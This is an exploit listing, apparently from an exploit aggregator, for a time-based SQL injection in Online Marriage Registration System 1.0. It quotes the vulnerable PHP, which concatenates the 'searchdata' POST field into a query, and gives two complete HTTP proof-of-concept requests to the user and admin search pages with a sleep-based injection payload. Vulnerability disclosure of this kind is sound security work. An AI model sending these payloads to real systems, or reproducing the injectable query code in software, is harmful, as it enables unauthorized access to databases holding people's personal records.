Exploit for Online Marriage Registration System 1.0 SQL Injection

Name: Exploit for Online Marriage Registration System 1.0 SQL Injection
Rating: 5 (204 reviews)
2020-12-21 | CVSS 0.6
## https://sploitus.com/exploit?id=PACKETSTORM:160649
# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection  
# Date: 12-21-2020  
# Exploit Authors: Andrea Bruschi, Raffaele Sabato  
# Vendor: Phpgurukul  
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/  
# Version: 1.0  
  
I DESCRIPTION  
========================================================================  
  
A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account.   
Following the vulnerable code:  
  
$sdata=$_POST['searchdata'];  
?>  
<h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>   
<table id="datatable1" class="table display responsive nowrap">  
<thead>  
<tr>  
<th class="wd-15p">S.No</th>  
  
<th class="wd-15p">Reg Number</th>  
<th class="wd-20p">Husband Name</th>  
  
<th class="wd-10p">Date of Marriage</th>  
<th class="wd-10p">Status</th>  
<th class="wd-25p">Action</th>  
</tr>  
</thead>  
<tbody>  
<?php  
$uid=$_SESSION['omrsuid'];  
$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";  
$query = $dbh -> prepare($sql);  
$query->execute();  
$results=$query->fetchAll(PDO::FETCH_OBJ);  
  
II PROOF OF CONCEPT  
========================================================================  
  
## Request user  
  
POST /omrs/user/search.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884  
Content-Length: 320  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/omrs/user/search.php  
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2  
Upgrade-Insecure-Requests: 1  
  
-----------------------------197361427118054779422510078884  
Content-Disposition: form-data; name="searchdata"  
  
' and (select 1 from (select(sleep(5)))a) and 'a'='a  
-----------------------------197361427118054779422510078884  
Content-Disposition: form-data; name="search"  
  
  
-----------------------------197361427118054779422510078884--  
  
## Request admin  
  
POST /omrs/admin/search.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522  
Content-Length: 320  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/omrs/admin/search.php  
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2  
Upgrade-Insecure-Requests: 1  
  
-----------------------------267799269040335247322746025522  
Content-Disposition: form-data; name="searchdata"  
  
' and (select 1 from (select(sleep(5)))a) and 'a'='a  
-----------------------------267799269040335247322746025522  
Content-Disposition: form-data; name="search"  
  
  
-----------------------------267799269040335247322746025522--